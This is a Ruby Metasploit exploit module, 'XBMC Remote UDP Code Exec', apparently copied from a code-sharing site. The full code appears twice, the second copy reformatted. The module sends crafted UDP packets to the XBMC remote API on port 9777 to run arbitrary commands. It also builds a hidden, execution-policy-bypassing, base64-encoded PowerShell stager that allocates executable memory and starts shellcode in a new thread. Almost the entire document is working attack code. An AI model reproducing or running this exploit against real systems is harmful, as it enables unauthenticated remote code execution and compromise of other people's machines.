carnal0wnage/xbmc_remote_exec.rb

## xbmc_remote_exec.rb
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Udp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'XBMC Remote UDP Code Exec',
      'Description'    => %q{
          This module uses the XBMC remote API to run a command on the target server.  For
          Windows 7 and Windows 8, it can also be used to launch a Powershell-based direct
          shellcode injection exploit.

          Tested on XBMC 12.3 (Frodo).
      },
      'Author'         =>
        [ 'Phikshun' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 14774 $',
      'References'     =>
        [ [ 'URL', 'http://disconnected.io/2014/02/20/its-a-feature/' ], ],
      'DefaultOptions' => { },
      'Platform'       => %w{ win unix },
      'Targets'        =>
        [
          [ 'Windows 7/8 x64', {
              'Arch' => ARCH_X86,
              'Platform' => 'win',
              'Powershell' => "c:\\windows\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe"
            } ],
          [ 'Windows 7/8 x86', {
              'Arch' => ARCH_X86,
              'Platform' => 'win',
              'Powershell' => "c:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe"
            } ],
          [ 'Windows CMD', {
              'Arch' => ARCH_CMD,
              'Platform' => 'win'
            } ],
          [ 'Unix CMD', {
              'Arch' => ARCH_CMD,
              'Platform' => 'unix'
            } ]
        ],
      'Privileged'     => false,
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'It\'s a feature' ))

    register_options([Opt::RPORT(9777)], self.class)
  end

  def exploit
    connect_udp

    if datastore['CMD']
      print_status("Executing command #{datastore['CMD']}")
      command = datastore['CMD']
    else
      print_status("Encoding shellcode with Powershell")
      command = "#{target['Powershell']} -w hidden -nop -ep bypass -noexit -encodedCommand " +
                   Rex::Text.encode_base64(Rex::Text.to_unicode(generate_powershell))
    end

    print_status("Sending exploit")
    build_xbmc_remote_messages(command).each do |pkt|
      udp_sock.put(pkt)
      print_status("Wrote UDP packet of length #{pkt.length}")
    end

    handler
    disconnect_udp
    5.times { select(nil, nil, nil, 1) }
  end

  def build_xbmc_remote_messages(cmd)
    cmd = "\x01XBMC.system.exec(#{cmd})\x00"
    messages = []
    messages << hello_message

    count = (cmd.length / 992) + 1
    cmd.scan(/.{1,992}/m).each_with_index do |c,i|
      messages << message_header((i > 0 ? 8 : 10), i+1, count, c.length) + c
    end

    messages << bye_message
    messages
  end

  def hello_message
    "\x58\x42\x4d\x43\x02\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00" +
    "\x0f\x52\xea\xc6\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x6d\x73" +
    "\x66\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  end

  def bye_message
    "\x58\x42\x4d\x43\x02\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\x00" +
    "\x00\x52\xea\xc6\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  end

  def message_header(type, seq, count, size)
    header  = "\x58\x42\x4d\x43\x02\x00"
    header += [type].pack('n')
    header += [seq].pack('N')
    header += [count].pack('N')
    header += [size].pack('n')
    header += "\x52\xea\xc6\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    header
  end

  def generate_powershell
    powershell = "$code = @\"
[DllImport(\"kernel32.dll\")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport(\"kernel32.dll\")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport(\"msvcrt.dll\")]
public static extern IntPtr memset(IntPtr dest, uint src, uint count);
\"@
$winFunc = Add-Type -memberDefinition $code -Name \"Win32\" -namespace Win32Functions -passthru
[Byte[]]$sc =#{Rex::Text.to_hex(payload.encoded).gsub('\\',',0').sub(',','')}
$size = 0x1000
if ($sc.Length -gt 0x1000) {$size = $sc.Length}
$x=$winFunc::VirtualAlloc(0,0x1000,$size,0x40)
for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)}
$winFunc::CreateThread(0,0,$x,0,0,0)"
  end
end
	require 'msf/core'

	class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Udp

	def initialize(info = {})
	super(update_info(info,
	'Name' => 'XBMC Remote UDP Code Exec',
	'Description' => %q{
	This module uses the XBMC remote API to run a command on the target server. For
	Windows 7 and Windows 8, it can also be used to launch a Powershell-based direct
	shellcode injection exploit.

	Tested on XBMC 12.3 (Frodo).
	},
	'Author' =>
	[ 'Phikshun' ],
	'License' => MSF_LICENSE,
	'Version' => '$Revision: 14774 $',
	'References' =>
	[ [ 'URL', 'http://disconnected.io/2014/02/20/its-a-feature/' ], ],
	'DefaultOptions' => { },
	'Platform' => %w{ win unix },
	'Targets' =>
	[
	[ 'Windows 7/8 x64', {
	'Arch' => ARCH_X86,
	'Platform' => 'win',
	'Powershell' => "c:\\windows\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe"
	} ],
	[ 'Windows 7/8 x86', {
	'Arch' => ARCH_X86,
	'Platform' => 'win',
	'Powershell' => "c:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe"
	} ],
	[ 'Windows CMD', {
	'Arch' => ARCH_CMD,
	'Platform' => 'win'
	} ],
	[ 'Unix CMD', {
	'Arch' => ARCH_CMD,
	'Platform' => 'unix'
	} ]
	],
	'Privileged' => false,
	'DefaultTarget' => 0,
	'DisclosureDate' => 'It\'s a feature' ))

	register_options([Opt::RPORT(9777)], self.class)
	end

	def exploit
	connect_udp

	if datastore['CMD']
	print_status("Executing command #{datastore['CMD']}")
	command = datastore['CMD']
	else
	print_status("Encoding shellcode with Powershell")
	command = "#{target['Powershell']} -w hidden -nop -ep bypass -noexit -encodedCommand " +
	Rex::Text.encode_base64(Rex::Text.to_unicode(generate_powershell))
	end

	print_status("Sending exploit")
	build_xbmc_remote_messages(command).each do \|pkt\|
	udp_sock.put(pkt)
	print_status("Wrote UDP packet of length #{pkt.length}")
	end

	handler
	disconnect_udp
	5.times { select(nil, nil, nil, 1) }
	end

	def build_xbmc_remote_messages(cmd)
	cmd = "\x01XBMC.system.exec(#{cmd})\x00"
	messages = []
	messages << hello_message

	count = (cmd.length / 992) + 1
	cmd.scan(/.{1,992}/m).each_with_index do \|c,i\|
	messages << message_header((i > 0 ? 8 : 10), i+1, count, c.length) + c
	end

	messages << bye_message
	messages
	end

	def hello_message
	"\x58\x42\x4d\x43\x02\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00" +
	"\x0f\x52\xea\xc6\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x6d\x73" +
	"\x66\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
	end

	def bye_message
	"\x58\x42\x4d\x43\x02\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\x00" +
	"\x00\x52\xea\xc6\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
	end

	def message_header(type, seq, count, size)
	header = "\x58\x42\x4d\x43\x02\x00"
	header += [type].pack('n')
	header += [seq].pack('N')
	header += [count].pack('N')
	header += [size].pack('n')
	header += "\x52\xea\xc6\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
	header
	end

	def generate_powershell
	powershell = "$code = @\"
	[DllImport(\"kernel32.dll\")]
	public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
	[DllImport(\"kernel32.dll\")]
	public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
	[DllImport(\"msvcrt.dll\")]
	public static extern IntPtr memset(IntPtr dest, uint src, uint count);
	\"@
	$winFunc = Add-Type -memberDefinition $code -Name \"Win32\" -namespace Win32Functions -passthru
	[Byte[]]$sc =#{Rex::Text.to_hex(payload.encoded).gsub('\\',',0').sub(',','')}
	$size = 0x1000
	if ($sc.Length -gt 0x1000) {$size = $sc.Length}
	$x=$winFunc::VirtualAlloc(0,0x1000,$size,0x40)
	for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)}
	$winFunc::CreateThread(0,0,$x,0,0,0)"
	end
	end